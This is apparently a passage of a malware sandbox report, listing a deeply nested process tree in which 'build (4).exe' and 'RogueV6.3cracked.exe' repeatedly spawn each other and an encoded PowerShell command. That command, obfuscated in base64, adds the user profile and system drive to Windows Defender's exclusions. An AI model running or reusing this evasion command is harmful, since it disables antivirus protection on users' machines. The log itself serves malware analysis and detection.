        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        303⤵
        
        PID:11724
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        303⤵
        
        PID:11732
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        303⤵
        
        PID:11744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        304⤵
        
        PID:12004
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        304⤵
        
        PID:12024
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        304⤵
        
        PID:12064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        305⤵
        
        PID:12248
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        305⤵
        
        PID:12256
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        305⤵
        
        PID:12264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        306⤵
        
        PID:8280
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        306⤵
        
        PID:9968
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        306⤵
        
        PID:11468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        307⤵
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        307⤵
        
        PID:8932
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        307⤵
        
        PID:8356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        308⤵
        
        PID:11920
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        309⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        308⤵
        
        PID:11588
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        308⤵
        
        PID:8480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        309⤵
        
        PID:11892
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        309⤵
        
        PID:11748
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        309⤵
        
        PID:11952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        310⤵
        
        PID:10396
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        310⤵
        
        PID:8848
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        310⤵
        
        PID:10072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        311⤵
        
        PID:10100
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        311⤵
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        311⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        312⤵
        
        PID:11308
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        312⤵
        
        PID:11908
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        312⤵
        
        PID:11636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        313⤵
        
        PID:6184
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        313⤵
        
        PID:7488
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        313⤵
        
        PID:9124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        314⤵
        
        PID:12188
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        314⤵
        
        PID:10268
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        314⤵
        
        PID:8768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        315⤵
        
        PID:11800
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        315⤵
        
        PID:11876
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        315⤵
        
        PID:4796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        316⤵
        
        PID:12152
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        316⤵
        
        PID:12056
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        316⤵
        
        PID:1996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        317⤵
        
        PID:11636
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        318⤵
        
        PID:6504
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        317⤵
        
        PID:11760
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        317⤵
        
        PID:10272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        318⤵
        
        PID:7612
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        318⤵
        
        PID:240
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        318⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        319⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        319⤵
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        319⤵
        
        PID:9776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        320⤵
        
        PID:1372
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        321⤵
        
        PID:7024
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        320⤵
        
        PID:11368
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        320⤵
        
        PID:11512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        321⤵
        
        PID:11136
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        321⤵
        
        PID:11104
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        321⤵
        
        PID:10940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        322⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        322⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        322⤵
        
        PID:5828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        323⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        323⤵
        
        PID:9532
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        323⤵
        
        PID:10960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        324⤵
        
        PID:8020
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        324⤵
        
        PID:10584
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        324⤵
        
        PID:4556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        325⤵
        
        PID:9940
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        325⤵
        
        PID:10444
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        325⤵
        
        PID:10696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        326⤵
        
        PID:6056
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        326⤵
        
        PID:6972
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        326⤵
        
        PID:9800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        327⤵
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        327⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        327⤵
        
        PID:9712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        328⤵
        
        PID:11356
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        328⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        328⤵
        
        PID:11772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        329⤵
        
        PID:10604
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        329⤵
        
        PID:8016
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        329⤵
        
        PID:11348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
